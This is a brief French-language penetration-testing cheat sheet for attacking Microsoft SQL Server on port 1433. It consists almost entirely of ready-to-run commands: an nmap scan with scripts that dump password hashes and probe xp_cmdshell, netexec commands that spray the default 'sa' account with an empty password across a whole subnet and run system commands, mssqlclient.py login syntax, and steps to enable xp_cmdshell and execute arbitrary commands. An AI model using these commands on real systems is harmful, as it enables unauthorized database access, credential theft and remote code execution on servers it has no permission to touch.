1433 - SQL Server
Détection
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Connexion
Test des identifiants par défaut :
# Connexion AD
nxc mssql 192.168.200.0/24 -u sa -p ''
# Connexion locale
nxc mssql 192.168.200.0/24 -u sa -p '' --local-auth
# Exécution de commande si disponible
nxc mssql 192.168.200.0/24 -u sa -p '' -x whoami
L’outil mssqlclient.py
permet aussi d’effectuer ce type de test :
# Authentification MSSQL
mssqlclient.py -db <DB_NAME> <USER>:<PASSWORD>@<IP>
# Authentification Windows
mssqlclient.py -db <DB_NAME> <USER>:<PASSWORD>@<IP> -windows-auth
XP_Cmdshell
Il est possible de simplifier l’exploitation de XP_Cmdshell à l’aide de l’outil mssqlclient.py
:
enable_xp_cmdshell
xp_cmdshell $CMD